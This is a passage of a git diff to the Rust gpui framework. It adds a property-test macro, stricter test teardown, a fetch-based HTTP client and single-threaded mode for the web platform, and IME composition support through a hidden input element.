https://docs.rs/proptest/latest/proptest/strategy/trait.Strategy.html +#[proc_macro_attribute] +pub fn property_test(args: TokenStream, function: TokenStream) -> TokenStream { + property_test::test(args.into(), function.into()).into() +} + /// When added to a trait, `#[derive_inspector_reflection]` generates a module which provides /// enumeration and lookup by name of all methods that have the shape `fn method(self) -> Self`. 
/// This is used by the inspector so that it can use the builder methods in `Styled` and diff --git a/crates/gpui_macros/src/property_test.rs b/crates/gpui_macros/src/property_test.rs new file mode 100644 index 0000000000000000000000000000000000000000..6bf60eca1b63a86bce22fbf4ae771230ee34726d --- /dev/null +++ b/crates/gpui_macros/src/property_test.rs @@ -0,0 +1,199 @@ +use proc_macro2::TokenStream; +use quote::{format_ident, quote, quote_spanned}; +use syn::{ + FnArg, Ident, ItemFn, Type, parse2, punctuated::Punctuated, spanned::Spanned, token::Comma, +}; + +pub fn test(args: TokenStream, item: TokenStream) -> TokenStream { + let item_span = item.span(); + let Ok(func) = parse2::(item) else { + return quote_spanned! { item_span => + compile_error!("#[gpui::property_test] must be placed on a function"); + }; + }; + + let test_name = func.sig.ident.clone(); + let inner_fn_name = format_ident!("__{test_name}"); + + let parsed_args = parse_args(func.sig.inputs, &test_name); + + let inner_body = func.block; + let inner_arg_decls = parsed_args.inner_fn_decl_args; + let asyncness = func.sig.asyncness; + + let inner_fn = quote! { + let #inner_fn_name = #asyncness move |#inner_arg_decls| #inner_body; + }; + + let arg_errors = parsed_args.errors; + let proptest_args = parsed_args.proptest_args; + let inner_args = parsed_args.inner_fn_args; + let cx_vars = parsed_args.cx_vars; + let cx_teardowns = parsed_args.cx_teardowns; + + let proptest_args = quote! { + #[strategy = ::gpui::seed_strategy()] __seed: u64, + #proptest_args + }; + + let run_test_body = match &asyncness { + None => quote! { + #cx_vars + #inner_fn_name(#inner_args); + #cx_teardowns + }, + Some(_) => quote! { + let foreground_executor = gpui::ForegroundExecutor::new(std::sync::Arc::new(dispatcher.clone())); + #cx_vars + foreground_executor.block_test(#inner_fn_name(#inner_args)); + #cx_teardowns + }, + }; + + quote! 
{ + #arg_errors + + #[::gpui::proptest::property_test(proptest_path = "::gpui::proptest", #args)] + fn #test_name(#proptest_args) { + #inner_fn + + ::gpui::run_test_once( + __seed, + Box::new(move |dispatcher| { + #run_test_body + }), + ) + } + } +} + +#[derive(Default)] +struct ParsedArgs { + cx_vars: TokenStream, + cx_teardowns: TokenStream, + proptest_args: TokenStream, + errors: TokenStream, + + // exprs passed at the call-site + inner_fn_args: TokenStream, + // args in the declaration + inner_fn_decl_args: TokenStream, +} + +fn parse_args(args: Punctuated, test_name: &Ident) -> ParsedArgs { + let mut parsed = ParsedArgs::default(); + let mut args = args.into_iter().collect(); + + remove_cxs(&mut parsed, &mut args, test_name); + remove_std_rng(&mut parsed, &mut args); + remove_background_executor(&mut parsed, &mut args); + + // all remaining args forwarded to proptest's macro + parsed.proptest_args = quote!( #(#args),* ); + + parsed +} + +fn remove_cxs(parsed: &mut ParsedArgs, args: &mut Vec, test_name: &Ident) { + let mut ix = 0; + args.retain_mut(|arg| { + if !is_test_cx(arg) { + return true; + } + + let cx_varname = format_ident!("cx_{ix}"); + ix += 1; + + parsed.cx_vars.extend(quote!( + let mut #cx_varname = gpui::TestAppContext::build( + dispatcher.clone(), + Some(stringify!(#test_name)), + ); + )); + parsed.cx_teardowns.extend(quote!( + dispatcher.run_until_parked(); + #cx_varname.executor().forbid_parking(); + #cx_varname.quit(); + dispatcher.run_until_parked(); + )); + + parsed.inner_fn_decl_args.extend(quote!(#arg,)); + parsed.inner_fn_args.extend(quote!(&mut #cx_varname,)); + + false + }); +} + +fn remove_std_rng(parsed: &mut ParsedArgs, args: &mut Vec) { + args.retain_mut(|arg| { + if !is_std_rng(arg) { + return true; + } + + parsed.errors.extend(quote_spanned! { arg.span() => + compile_error!("`StdRng` is not allowed in a property test. Consider implementing `Arbitrary`, or implementing a custom `Strategy`. 
https://altsysrq.github.io/proptest-book/proptest/tutorial/strategy-basics.html"); + }); + + false + }); +} + +fn remove_background_executor(parsed: &mut ParsedArgs, args: &mut Vec) { + args.retain_mut(|arg| { + if !is_background_executor(arg) { + return true; + } + + parsed.inner_fn_decl_args.extend(quote!(#arg,)); + parsed + .inner_fn_args + .extend(quote!(gpui::BackgroundExecutor::new(std::sync::Arc::new( + dispatcher.clone() + )),)); + + false + }); +} + +// Matches `&TestAppContext` or `&foo::bar::baz::TestAppContext` +fn is_test_cx(arg: &FnArg) -> bool { + let FnArg::Typed(arg) = arg else { + return false; + }; + + let Type::Reference(ty) = &*arg.ty else { + return false; + }; + + let Type::Path(ty) = &*ty.elem else { + return false; + }; + + ty.path + .segments + .last() + .is_some_and(|seg| seg.ident == "TestAppContext") +} + +fn is_std_rng(arg: &FnArg) -> bool { + is_path_with_last_segment(arg, "StdRng") +} + +fn is_background_executor(arg: &FnArg) -> bool { + is_path_with_last_segment(arg, "BackgroundExecutor") +} + +fn is_path_with_last_segment(arg: &FnArg, last_segment: &str) -> bool { + let FnArg::Typed(arg) = arg else { + return false; + }; + + let Type::Path(ty) = &*arg.ty else { + return false; + }; + + ty.path + .segments + .last() + .is_some_and(|seg| seg.ident == last_segment) +} diff --git a/crates/gpui_macros/src/test.rs b/crates/gpui_macros/src/test.rs index 490ea07fee696908fad91410aa67ff124cdabe64..087e01740d2ba48392afee0ed7e31cf0779b180d 100644 --- a/crates/gpui_macros/src/test.rs +++ b/crates/gpui_macros/src/test.rs @@ -165,12 +165,13 @@ fn generate_test_function( dispatcher.clone(), Some(stringify!(#outer_fn_name)), ); + let _entity_refcounts = #cx_varname.app.borrow().ref_counts_drop_handle(); )); cx_teardowns.extend(quote!( - dispatcher.run_until_parked(); - #cx_varname.executor().forbid_parking(); - #cx_varname.quit(); - dispatcher.run_until_parked(); + #cx_varname.run_until_parked(); + #cx_varname.update(|cx| { 
cx.background_executor().forbid_parking(); cx.quit(); }); + #cx_varname.run_until_parked(); + drop(#cx_varname); )); inner_fn_args.extend(quote!(&mut #cx_varname,)); continue; @@ -191,10 +192,17 @@ fn generate_test_function( &[#seeds], #max_retries, &mut |dispatcher, _seed| { - let foreground_executor = gpui::ForegroundExecutor::new(std::sync::Arc::new(dispatcher.clone())); + let exec = std::sync::Arc::new(dispatcher.clone()); #cx_vars - foreground_executor.block_test(#inner_fn_name(#inner_fn_args)); + gpui::ForegroundExecutor::new(exec.clone()).block_test(#inner_fn_name(#inner_fn_args)); + drop(exec); #cx_teardowns + // Ideally we would only drop cancelled tasks, that way we could detect leaks due to task <-> entity + // cycles as cancelled tasks will be dropped properly once the runnable gets run again + // + // async-task does not give us the power to do this just yet though + dispatcher.drain_tasks(); + drop(dispatcher); }, #on_failure_fn_name ); @@ -229,13 +237,15 @@ fn generate_test_function( Some(stringify!(#outer_fn_name)) ); let mut #cx_varname_lock = #cx_varname.app.borrow_mut(); + let _entity_refcounts = #cx_varname_lock.ref_counts_drop_handle(); )); inner_fn_args.extend(quote!(&mut #cx_varname_lock,)); cx_teardowns.extend(quote!( drop(#cx_varname_lock); - dispatcher.run_until_parked(); + #cx_varname.run_until_parked(); #cx_varname.update(|cx| { cx.background_executor().forbid_parking(); cx.quit(); }); - dispatcher.run_until_parked(); + #cx_varname.run_until_parked(); + drop(#cx_varname); )); continue; } @@ -246,12 +256,13 @@ fn generate_test_function( dispatcher.clone(), Some(stringify!(#outer_fn_name)) ); + let _entity_refcounts = #cx_varname.app.borrow().ref_counts_drop_handle(); )); cx_teardowns.extend(quote!( - dispatcher.run_until_parked(); - #cx_varname.executor().forbid_parking(); - #cx_varname.quit(); - dispatcher.run_until_parked(); + #cx_varname.run_until_parked(); + #cx_varname.update(|cx| { cx.background_executor().forbid_parking(); 
cx.quit(); }); + #cx_varname.run_until_parked(); + drop(#cx_varname); )); inner_fn_args.extend(quote!(&mut #cx_varname,)); continue; @@ -277,6 +288,12 @@ fn generate_test_function( #cx_vars #inner_fn_name(#inner_fn_args); #cx_teardowns + // Ideally we would only drop cancelled tasks, that way we could detect leaks due to task <-> entity + // cycles as cancelled tasks will be dropped properly once they runnable gets run again + // + // async-task does not give us the power to do this just yet though + dispatcher.drain_tasks(); + drop(dispatcher); }, #on_failure_fn_name, ); diff --git a/crates/gpui_platform/Cargo.toml b/crates/gpui_platform/Cargo.toml index cfb47b1851b9e792c31fad9aca79b3671095b603..22d44a96b21112336f3bee669c218c2291f78b65 100644 --- a/crates/gpui_platform/Cargo.toml +++ b/crates/gpui_platform/Cargo.toml @@ -28,6 +28,7 @@ gpui_macos.workspace = true [target.'cfg(target_os = "windows")'.dependencies] gpui_windows.workspace = true +gpui = { workspace = true, features = ["windows-manifest"] } [target.'cfg(any(target_os = "linux", target_os = "freebsd"))'.dependencies] gpui_linux.workspace = true diff --git a/crates/gpui_platform/src/gpui_platform.rs b/crates/gpui_platform/src/gpui_platform.rs index 86c0577f75ff4ac61ab7a4d956b7e34718fb26e5..1d2fea90b477542031dfbf591f458b2427ec6e01 100644 --- a/crates/gpui_platform/src/gpui_platform.rs +++ b/crates/gpui_platform/src/gpui_platform.rs @@ -18,6 +18,12 @@ pub fn headless() -> gpui::Application { gpui::Application::with_platform(current_platform(true)) } +/// Unlike `application`, this function returns a single-threaded web application. +#[cfg(target_family = "wasm")] +pub fn single_threaded_web() -> gpui::Application { + gpui::Application::with_platform(Rc::new(gpui_web::WebPlatform::new(false))) +} + /// Initializes panic hooks and logging for the web platform. /// Call this before running the application in a wasm_bindgen entrypoint. 
#[cfg(target_family = "wasm")] @@ -49,7 +55,23 @@ pub fn current_platform(headless: bool) -> Rc { #[cfg(target_family = "wasm")] { let _ = headless; - Rc::new(gpui_web::WebPlatform::new()) + Rc::new(gpui_web::WebPlatform::new(true)) + } +} + +/// Returns a new [`HeadlessRenderer`] for the current platform, if available. +#[cfg(feature = "test-support")] +pub fn current_headless_renderer() -> Option> { + #[cfg(target_os = "macos")] + { + Some(Box::new( + gpui_macos::metal_renderer::MetalHeadlessRenderer::new(), + )) + } + + #[cfg(not(target_os = "macos"))] + { + None } } diff --git a/crates/gpui_web/Cargo.toml b/crates/gpui_web/Cargo.toml index a2bb95a9f4bb3007a2a2feb9f7483d38dff3cf1d..5980fa5e855214e1d240dcaaacd59ae4bb6f3537 100644 --- a/crates/gpui_web/Cargo.toml +++ b/crates/gpui_web/Cargo.toml @@ -9,6 +9,10 @@ autoexamples = false [lints] workspace = true +[features] +default = ["multithreaded"] +multithreaded = ["dep:wasm_thread"] + [lib] path = "src/gpui_web.rs" @@ -16,6 +20,7 @@ path = "src/gpui_web.rs" gpui.workspace = true parking_lot = { workspace = true, features = ["nightly"] } gpui_wgpu.workspace = true +http_client.workspace = true anyhow.workspace = true futures.workspace = true log.workspace = true @@ -27,9 +32,10 @@ web-time.workspace = true console_error_panic_hook = "0.1.7" js-sys = "0.3" raw-window-handle = "0.6" -wasm_thread = { version = "0.3", features = ["es_modules"] } +wasm_thread = { version = "0.3", features = ["es_modules"], optional = true } web-sys = { version = "0.3", features = [ "console", + "CompositionEvent", "CssStyleDeclaration", "DataTransfer", "Document", @@ -56,6 +62,11 @@ web-sys = { version = "0.3", features = [ "Screen", "Storage", "VisualViewport", + "Headers", + "Request", + "RequestInit", + "RequestRedirect", + "Response", "WheelEvent", "Window", ] } diff --git a/crates/gpui_web/src/dispatcher.rs b/crates/gpui_web/src/dispatcher.rs index ca0b700a1bf0bc75e1dafd859b59a04540524f63..5a0911f7ef1a33d1959de6d03f9f9797978b7a9b 
100644 --- a/crates/gpui_web/src/dispatcher.rs +++ b/crates/gpui_web/src/dispatcher.rs @@ -8,8 +8,10 @@ use std::time::Duration; use wasm_bindgen::prelude::*; use web_time::Instant; +#[cfg(feature = "multithreaded")] const MIN_BACKGROUND_THREADS: usize = 2; +#[cfg(feature = "multithreaded")] fn shared_memory_supported() -> bool { let global = js_sys::global(); let has_shared_array_buffer = @@ -126,6 +128,7 @@ pub struct WebDispatcher { background_sender: PriorityQueueSender, main_thread_mailbox: Arc, supports_threads: bool, + #[cfg(feature = "multithreaded")] _background_threads: Vec>, } @@ -135,11 +138,18 @@ unsafe impl Send for WebDispatcher {} unsafe impl Sync for WebDispatcher {} impl WebDispatcher { - pub fn new(browser_window: web_sys::Window) -> Self { + pub fn new(browser_window: web_sys::Window, allow_threads: bool) -> Self { + #[cfg(feature = "multithreaded")] let (background_sender, background_receiver) = PriorityQueueReceiver::new(); + #[cfg(not(feature = "multithreaded"))] + let (background_sender, _) = PriorityQueueReceiver::new(); let main_thread_mailbox = Arc::new(MainThreadMailbox::new()); - let supports_threads = shared_memory_supported(); + + #[cfg(feature = "multithreaded")] + let supports_threads = allow_threads && shared_memory_supported(); + #[cfg(not(feature = "multithreaded"))] + let supports_threads = false; if supports_threads { main_thread_mailbox.run_waker_loop(browser_window.clone()); @@ -149,6 +159,7 @@ impl WebDispatcher { ); } + #[cfg(feature = "multithreaded")] let background_threads = if supports_threads { let thread_count = browser_window .navigator() @@ -173,10 +184,6 @@ impl WebDispatcher { } }; - if runnable.metadata().is_closed() { - continue; - } - runnable.run(); } }) @@ -193,6 +200,7 @@ impl WebDispatcher { background_sender, main_thread_mailbox, supports_threads, + #[cfg(feature = "multithreaded")] _background_threads: background_threads, } } @@ -251,9 +259,7 @@ impl PlatformDispatcher for WebDispatcher { let millis = 
duration.as_millis().min(i32::MAX as u128) as i32; if self.on_main_thread() { let callback = Closure::once_into_js(move || { - if !runnable.metadata().is_closed() { - runnable.run(); - } + runnable.run(); }); self.browser_window .set_timeout_with_callback_and_timeout_and_arguments_0( @@ -288,15 +294,11 @@ impl PlatformDispatcher for WebDispatcher { fn execute_on_main_thread(window: &web_sys::Window, item: MainThreadItem) { match item { MainThreadItem::Runnable(runnable) => { - if !runnable.metadata().is_closed() { - runnable.run(); - } + runnable.run(); } MainThreadItem::Delayed { runnable, millis } => { let callback = Closure::once_into_js(move || { - if !runnable.metadata().is_closed() { - runnable.run(); - } + runnable.run(); }); window .set_timeout_with_callback_and_timeout_and_arguments_0( @@ -313,9 +315,7 @@ fn execute_on_main_thread(window: &web_sys::Window, item: MainThreadItem) { fn schedule_runnable(window: &web_sys::Window, runnable: RunnableVariant, priority: Priority) { let callback = Closure::once_into_js(move || { - if !runnable.metadata().is_closed() { - runnable.run(); - } + runnable.run(); }); let callback: &js_sys::Function = callback.unchecked_ref(); diff --git a/crates/gpui_web/src/events.rs b/crates/gpui_web/src/events.rs index 5f6d8527e70a3778a46a11e00758e822790e742f..e93534fbe88238118ce0a1e819aec5ff3c3d201a 100644 --- a/crates/gpui_web/src/events.rs +++ b/crates/gpui_web/src/events.rs @@ -1,10 +1,10 @@ use std::rc::Rc; use gpui::{ - Capslock, ExternalPaths, FileDropEvent, KeyDownEvent, KeyUpEvent, Keystroke, Modifiers, - ModifiersChangedEvent, MouseButton, MouseDownEvent, MouseExitEvent, MouseMoveEvent, - MouseUpEvent, NavigationDirection, Pixels, PlatformInput, Point, ScrollDelta, ScrollWheelEvent, - TouchPhase, point, px, + Capslock, DispatchEventResult, ExternalPaths, FileDropEvent, KeyDownEvent, KeyUpEvent, + Keystroke, Modifiers, ModifiersChangedEvent, MouseButton, MouseDownEvent, MouseExitEvent, + MouseMoveEvent, MouseUpEvent, 
NavigationDirection, Pixels, PlatformInput, Point, ScrollDelta, + ScrollWheelEvent, TouchPhase, point, px, }; use smallvec::smallvec; use wasm_bindgen::prelude::*; @@ -64,6 +64,9 @@ impl WebWindowInner { self.register_dragleave(), self.register_key_down(), self.register_key_up(), + self.register_composition_start(), + self.register_composition_update(), + self.register_composition_end(), self.register_focus(), self.register_blur(), self.register_pointer_enter(), @@ -87,6 +90,18 @@ impl WebWindowInner { closure } + fn listen_input( + self: &Rc, + event_name: &str, + handler: impl FnMut(JsValue) + 'static, + ) -> Closure { + let closure = Closure::::new(handler); + self.input_element + .add_event_listener_with_callback(event_name, closure.as_ref().unchecked_ref()) + .ok(); + closure + } + /// Registers a listener with `{passive: false}` so that `preventDefault()` works. /// Needed for events like `wheel` which are passive by default in modern browsers. fn listen_non_passive( @@ -109,11 +124,9 @@ impl WebWindowInner { closure } - fn dispatch_input(&self, input: PlatformInput) { + fn dispatch_input(&self, input: PlatformInput) -> Option { let mut borrowed = self.callbacks.borrow_mut(); - if let Some(ref mut callback) = borrowed.input { - callback(input); - } + borrowed.input.as_mut().map(|callback| callback(input)) } fn register_pointer_down(self: &Rc) -> Closure { @@ -121,7 +134,7 @@ impl WebWindowInner { self.listen("pointerdown", move |event: JsValue| { let event: web_sys::PointerEvent = event.unchecked_into(); event.prevent_default(); - this.canvas.focus().ok(); + this.input_element.focus().ok(); let button = dom_mouse_button_to_gpui(event.button()); let position = pointer_position_in_element(&event); @@ -315,7 +328,7 @@ impl WebWindowInner { fn register_key_down(self: &Rc) -> Closure { let this = Rc::clone(self); - self.listen("keydown", move |event: JsValue| { + self.listen_input("keydown", move |event: JsValue| { let event: web_sys::KeyboardEvent = 
event.unchecked_into(); let modifiers = modifiers_from_keyboard_event(&event, this.is_mac); @@ -346,20 +359,38 @@ impl WebWindowInner { let keystroke = Keystroke { modifiers, key, - key_char, + key_char: key_char.clone(), }; - this.dispatch_input(PlatformInput::KeyDown(KeyDownEvent { + let result = this.dispatch_input(PlatformInput::KeyDown(KeyDownEvent { keystroke, is_held, prefer_character_input: false, })); + + if let Some(result) = result { + if !result.propagate { + return; + } + } + + if this.is_composing.get() || event.is_composing() { + return; + } + + if modifiers.is_subset_of(&Modifiers::shift()) { + if let Some(text) = key_char { + this.with_input_handler(|handler| { + handler.replace_text_in_range(None, &text); + }); + } + } }) } fn register_key_up(self: &Rc) -> Closure { let this = Rc::clone(self); - self.listen("keyup", move |event: JsValue| { + self.listen_input("keyup", move |event: JsValue| { let event: web_sys::KeyboardEvent = event.unchecked_into(); let modifiers = modifiers_from_keyboard_event(&event, this.is_mac); @@ -396,9 +427,42 @@ impl WebWindowInner { }) } + fn register_composition_start(self: &Rc) -> Closure { + let this = Rc::clone(self); + self.listen_input("compositionstart", move |_event: JsValue| { + this.is_composing.set(true); + }) + } + + fn register_composition_update(self: &Rc) -> Closure { + let this = Rc::clone(self); + self.listen_input("compositionupdate", move |event: JsValue| { + let event: web_sys::CompositionEvent = event.unchecked_into(); + let data = event.data().unwrap_or_default(); + this.is_composing.set(true); + this.with_input_handler(|handler| { + handler.replace_and_mark_text_in_range(None, &data, None); + }); + }) + } + + fn register_composition_end(self: &Rc) -> Closure { + let this = Rc::clone(self); + self.listen_input("compositionend", move |event: JsValue| { + let event: web_sys::CompositionEvent = event.unchecked_into(); + let data = event.data().unwrap_or_default(); + this.is_composing.set(false); + 
this.with_input_handler(|handler| { + handler.replace_text_in_range(None, &data); + handler.unmark_text(); + }); + this.input_element.set_value(""); + }) + } + fn register_focus(self: &Rc) -> Closure { let this = Rc::clone(self); - self.listen("focus", move |_event: JsValue| { + self.listen_input("focus", move |_event: JsValue| { { let mut state = this.state.borrow_mut(); state.is_active = true; @@ -412,7 +476,7 @@ impl WebWindowInner { fn register_blur(self: &Rc) -> Closure { let this = Rc::clone(self); - self.listen("blur", move |_event: JsValue| { + self.listen_input("blur", move |_event: JsValue| { { let mut state = this.state.borrow_mut(); state.is_active = false; @@ -556,7 +620,10 @@ pub(crate) fn is_mac_platform(browser_window: &web_sys::Window) -> bool { } fn is_modifier_only_key(key: &str) -> bool { - matches!(key, "control" | "alt" | "shift" | "platform" | "capslock") + matches!( + key, + "control" | "alt" | "shift" | "platform" | "capslock" | "compose" | "process" + ) } fn compute_key_char( diff --git a/crates/gpui_web/src/gpui_web.rs b/crates/gpui_web/src/gpui_web.rs index 966ff3b0d7d90219e8cf702a16fce598f813c835..9cd773823bd9b65ef99cb89c12184919a4c45dc2 100644 --- a/crates/gpui_web/src/gpui_web.rs +++ b/crates/gpui_web/src/gpui_web.rs @@ -3,6 +3,7 @@ mod dispatcher; mod display; mod events; +mod http_client; mod keyboard; mod logging; mod platform; @@ -10,6 +11,7 @@ mod window; pub use dispatcher::WebDispatcher; pub use display::WebDisplay; +pub use http_client::FetchHttpClient; pub use keyboard::WebKeyboardLayout; pub use logging::init_logging; pub use platform::WebPlatform; diff --git a/crates/gpui_web/src/http_client.rs b/crates/gpui_web/src/http_client.rs new file mode 100644 index 0000000000000000000000000000000000000000..14d58cf45766885af76f49892589f70b89fb8116 --- /dev/null +++ b/crates/gpui_web/src/http_client.rs @@ -0,0 +1,199 @@ +use anyhow::anyhow; +use futures::AsyncReadExt as _; +use http_client::{AsyncBody, HttpClient, RedirectPolicy}; 
+use std::future::Future; +use std::pin::Pin; +use std::task::Poll; +use wasm_bindgen::JsCast as _; +use wasm_bindgen::prelude::*; + +#[wasm_bindgen] +extern "C" { + #[wasm_bindgen(catch, js_name = "fetch")] + fn global_fetch(input: &web_sys::Request) -> Result; +} + +pub struct FetchHttpClient { + user_agent: Option, +} + +impl Default for FetchHttpClient { + fn default() -> Self { + Self { user_agent: None } + } +} + +#[cfg(feature = "multithreaded")] +impl FetchHttpClient { + /// # Safety + /// + /// The caller must ensure that the created `FetchHttpClient` is only used in a single thread environment. + pub unsafe fn new() -> Self { + Self::default() + } + + /// # Safety + /// + /// The caller must ensure that the created `FetchHttpClient` is only used in a single thread environment. + pub unsafe fn with_user_agent(user_agent: &str) -> anyhow::Result { + Ok(Self { + user_agent: Some(http_client::http::header::HeaderValue::from_str( + user_agent, + )?), + }) + } +} + +#[cfg(not(feature = "multithreaded"))] +impl FetchHttpClient { + pub fn new() -> Self { + Self::default() + } + + pub fn with_user_agent(user_agent: &str) -> anyhow::Result { + Ok(Self { + user_agent: Some(http_client::http::header::HeaderValue::from_str( + user_agent, + )?), + }) + } +} + +/// Wraps a `!Send` future to satisfy the `Send` bound on `BoxFuture`. +/// +/// Safety: only valid in WASM contexts where the `FetchHttpClient` is +/// confined to a single thread (guaranteed by the caller via unsafe +/// constructors when `multithreaded` is enabled, or by the absence of +/// threads when it is not). +struct AssertSend(F); + +unsafe impl Send for AssertSend {} + +impl Future for AssertSend { + type Output = F::Output; + + fn poll(self: Pin<&mut Self>, cx: &mut std::task::Context<'_>) -> Poll { + // Safety: pin projection for a single-field newtype wrapper. 
+ let inner = unsafe { self.map_unchecked_mut(|this| &mut this.0) }; + inner.poll(cx) + } +} + +impl HttpClient for FetchHttpClient { + fn user_agent(&self) -> Option<&http_client::http::header::HeaderValue> { + self.user_agent.as_ref() + } + + fn proxy(&self) -> Option<&http_client::Url> { + None + } + + fn send( + &self, + req: http_client::http::Request, + ) -> futures::future::BoxFuture<'static, anyhow::Result>> + { + let (parts, body) = req.into_parts(); + + Box::pin(AssertSend(async move { + let body_bytes = read_body_to_bytes(body).await?; + + let init = web_sys::RequestInit::new(); + init.set_method(parts.method.as_str()); + + if let Some(redirect_policy) = parts.extensions.get::() { + match redirect_policy { + RedirectPolicy::NoFollow => { + init.set_redirect(web_sys::RequestRedirect::Manual); + } + RedirectPolicy::FollowLimit(_) | RedirectPolicy::FollowAll => { + init.set_redirect(web_sys::RequestRedirect::Follow); + } + } + } + + if let Some(ref bytes) = body_bytes { + let uint8array = js_sys::Uint8Array::from(bytes.as_slice()); + init.set_body(uint8array.as_ref()); + } + + let url = parts.uri.to_string(); + let request = web_sys::Request::new_with_str_and_init(&url, &init) + .map_err(|error| anyhow!("failed to create fetch Request: {error:?}"))?; + + let request_headers = request.headers(); + for (name, value) in &parts.headers { + let value_str = value + .to_str() + .map_err(|_| anyhow!("non-ASCII header value for {name}"))?; + request_headers + .set(name.as_str(), value_str) + .map_err(|error| anyhow!("failed to set header {name}: {error:?}"))?; + } + + let promise = global_fetch(&request) + .map_err(|error| anyhow!("fetch threw an error: {error:?}"))?; + let response_value = wasm_bindgen_futures::JsFuture::from(promise) + .await + .map_err(|error| anyhow!("fetch failed: {error:?}"))?; + + let web_response: web_sys::Response = response_value + .dyn_into() + .map_err(|error| anyhow!("fetch result is not a Response: {error:?}"))?; + + let status = 
web_response.status(); + let mut builder = http_client::http::Response::builder().status(status); + + // `Headers` is a JS iterable yielding `[name, value]` pairs. + // `js_sys::Array::from` calls `Array.from()` which accepts any iterable. + let header_pairs = js_sys::Array::from(&web_response.headers()); + for index in 0..header_pairs.length() { + match header_pairs.get(index).dyn_into::() { + Ok(pair) => match (pair.get(0).as_string(), pair.get(1).as_string()) { + (Some(name), Some(value)) => { + builder = builder.header(name, value); + } + (name, value) => { + log::warn!( + "skipping response header at index {index}: \ + name={name:?}, value={value:?}" + ); + } + }, + Err(entry) => { + log::warn!("skipping non-array header entry at index {index}: {entry:?}"); + } + } + } + + // The entire response body is eagerly buffered into memory via + // `arrayBuffer()`. The Fetch API does not expose a synchronous + // streaming interface; streaming would require `ReadableStream` + // interop which is significantly more complex. 
+ let body_promise = web_response + .array_buffer() + .map_err(|error| anyhow!("failed to initiate response body read: {error:?}"))?; + let body_value = wasm_bindgen_futures::JsFuture::from(body_promise) + .await + .map_err(|error| anyhow!("failed to read response body: {error:?}"))?; + let array_buffer: js_sys::ArrayBuffer = body_value + .dyn_into() + .map_err(|error| anyhow!("response body is not an ArrayBuffer: {error:?}"))?; + let response_bytes = js_sys::Uint8Array::new(&array_buffer).to_vec(); + + builder + .body(AsyncBody::from(response_bytes)) + .map_err(|error| anyhow!(error)) + })) + } +} + +async fn read_body_to_bytes(mut body: AsyncBody) -> anyhow::Result>> { + let mut buffer = Vec::new(); + body.read_to_end(&mut buffer).await?; + if buffer.is_empty() { + Ok(None) + } else { + Ok(Some(buffer)) + } +} diff --git a/crates/gpui_web/src/platform.rs b/crates/gpui_web/src/platform.rs index 420b7cb3f470c683888aa76bd61236c1f1ff181e..4d78b71aa05b743f779d0e8a1e7ed8a5eac136f9 100644 --- a/crates/gpui_web/src/platform.rs +++ b/crates/gpui_web/src/platform.rs @@ -54,10 +54,13 @@ struct WebPlatformCallbacks { } impl WebPlatform { - pub fn new() -> Self { + pub fn new(allow_multi_threading: bool) -> Self { let browser_window = web_sys::window().expect("must be running in a browser window context"); - let dispatcher = Arc::new(WebDispatcher::new(browser_window.clone())); + let dispatcher = Arc::new(WebDispatcher::new( + browser_window.clone(), + allow_multi_threading, + )); let background_executor = BackgroundExecutor::new(dispatcher.clone()); let foreground_executor = ForegroundExecutor::new(dispatcher); let text_system = Arc::new(gpui_wgpu::CosmicTextSystem::new_without_system_fonts( diff --git a/crates/gpui_web/src/window.rs b/crates/gpui_web/src/window.rs index c29fa509dd206406b24069053dc71bdc4dc18e75..125432c0ae8814a43e8e742547742013d2a75c65 100644 --- a/crates/gpui_web/src/window.rs +++ b/crates/gpui_web/src/window.rs @@ -45,6 +45,7 @@ pub(crate) struct 
WebWindowMutableState { pub(crate) struct WebWindowInner { pub(crate) browser_window: web_sys::Window, pub(crate) canvas: web_sys::HtmlCanvasElement, + pub(crate) input_element: web_sys::HtmlInputElement, pub(crate) has_device_pixel_support: bool, pub(crate) is_mac: bool, pub(crate) state: RefCell, @@ -53,7 +54,9 @@ pub(crate) struct WebWindowInner { pub(crate) pressed_button: Cell>, pub(crate) last_physical_size: Cell<(u32, u32)>, pub(crate) notify_scale: Cell, + pub(crate) is_composing: Cell, mql_handle: RefCell>, + pending_physical_size: Cell>, } pub struct WebWindow { @@ -88,7 +91,7 @@ impl WebWindow { let max_texture_dimension = context.device.limits().max_texture_dimension_2d; let has_device_pixel_support = check_device_pixel_support(); - canvas.set_tab_index(0); + canvas.set_tab_index(-1); let style = canvas.style(); style @@ -113,7 +116,21 @@ impl WebWindow { body.append_child(&canvas) .map_err(|e| anyhow::anyhow!("Failed to append canvas to body: {e:?}"))?; - canvas.focus().ok(); + let input_element: web_sys::HtmlInputElement = document + .create_element("input") + .map_err(|e| anyhow::anyhow!("Failed to create input element: {e:?}"))? 
+ .dyn_into() + .map_err(|e| anyhow::anyhow!("Created element is not an input: {e:?}"))?; + let input_style = input_element.style(); + input_style.set_property("position", "fixed").ok(); + input_style.set_property("top", "0").ok(); + input_style.set_property("left", "0").ok(); + input_style.set_property("width", "1px").ok(); + input_style.set_property("height", "1px").ok(); + input_style.set_property("opacity", "0").ok(); + body.append_child(&input_element) + .map_err(|e| anyhow::anyhow!("Failed to append input to body: {e:?}"))?; + input_element.focus().ok(); let device_size = Size { width: DevicePixels(0), @@ -123,6 +140,7 @@ impl WebWindow { let renderer_config = WgpuSurfaceConfig { size: device_size, transparent: false, + preferred_present_mode: None, }; let renderer = WgpuRenderer::new_from_canvas(context, &canvas, renderer_config)?; @@ -154,6 +172,7 @@ impl WebWindow { let inner = Rc::new(WebWindowInner { browser_window, canvas, + input_element, has_device_pixel_support, is_mac, state: RefCell::new(mutable_state), @@ -162,7 +181,9 @@ impl WebWindow { pressed_button: Cell::new(None), last_physical_size: Cell::new((0, 0)), notify_scale: Cell::new(false), + is_composing: Cell::new(false), mql_handle: RefCell::new(None), + pending_physical_size: Cell::new(None), }); let raf_closure = inner.create_raf_closure(); @@ -252,8 +273,9 @@ impl WebWindow { let clamped_width = physical_width.min(max_texture_dimension); let clamped_height = physical_height.min(max_texture_dimension); - inner.canvas.set_width(clamped_width); - inner.canvas.set_height(clamped_height); + inner + .pending_physical_size + .set(Some((clamped_width, clamped_height))); { let mut s = inner.state.borrow_mut(); @@ -262,10 +284,6 @@ impl WebWindow { height: px(logical_height), }; s.scale_factor = dpr_f32; - s.renderer.update_drawable_size(Size { - width: DevicePixels(clamped_width as i32), - height: DevicePixels(clamped_height as i32), - }); } let new_size = Size { @@ -390,6 +408,16 @@ impl 
